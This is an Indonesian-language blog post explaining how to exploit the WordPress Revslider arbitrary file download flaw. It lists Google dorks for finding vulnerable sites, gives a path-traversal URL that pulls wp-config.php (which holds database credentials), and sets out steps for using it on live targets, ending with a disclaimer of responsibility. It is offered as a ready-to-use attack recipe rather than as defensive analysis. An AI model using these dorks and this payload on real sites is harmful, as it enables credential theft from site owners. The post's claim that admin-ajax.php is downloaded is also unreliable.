Skip to content Skip to sidebar Skip to footer
Apa Itu Exploit Wordpress Revslider Arbritary File Download Vulnerability

Apa Itu Exploit Wordpress Revslider Arbritary File Download Vulnerability

SehatMang- Halo teman kali ini saya akan membahas eksploitasi Wordpress Revsider Arbritary File Unduh eksploit ini untuk mengunduh file file penting di server web, terutama web yang menggunakan cms Wordpress, tetapi tidak semua web yang menggunakan cms rentan terhadap eksploitasi ini.

Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.



Dork :

  • inurl:wp-content/plugins/revslider/
  • inurl:revslider
  • inurl:revslider_admin.php
  • inurl:revslider_front.php
  • inurl:plugins/revslider/
  • intext:Powered by Revslider
  • intitle:"Index Of/ revslider"
  • intitle:"Index Of/wp-content/themes/revslider"
  • intitle:"Index Of/wp-content/plugins/revslider"
  • intitle:"Index Of/admin/revslider"
  • intitle:"Index Of/fr/revslider"
  • intitle:"Index Of/en/revslider"
  • intitle:"Index Of/us/revslider"
  • intitle:"Index Of/ar/revslider"
  • intitle:"Index Of/es/revslider"
  • intitle:"Index Of/de/revslider"
Exploit :
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Step :
  1. Dorking dengan dork yang sudah disediakan.
  2. Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  3. Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.

Seperti Wordpress Revslider Arbitary File Unduh Kerentanan Eksploitasi yang saya bagikan semoga bermanfaat dan saya tidak bertanggung jawab atas apa yang Anda lakukan, terima kasih.
Open Comments

Post a Comment for "Apa Itu Exploit Wordpress Revslider Arbritary File Download Vulnerability"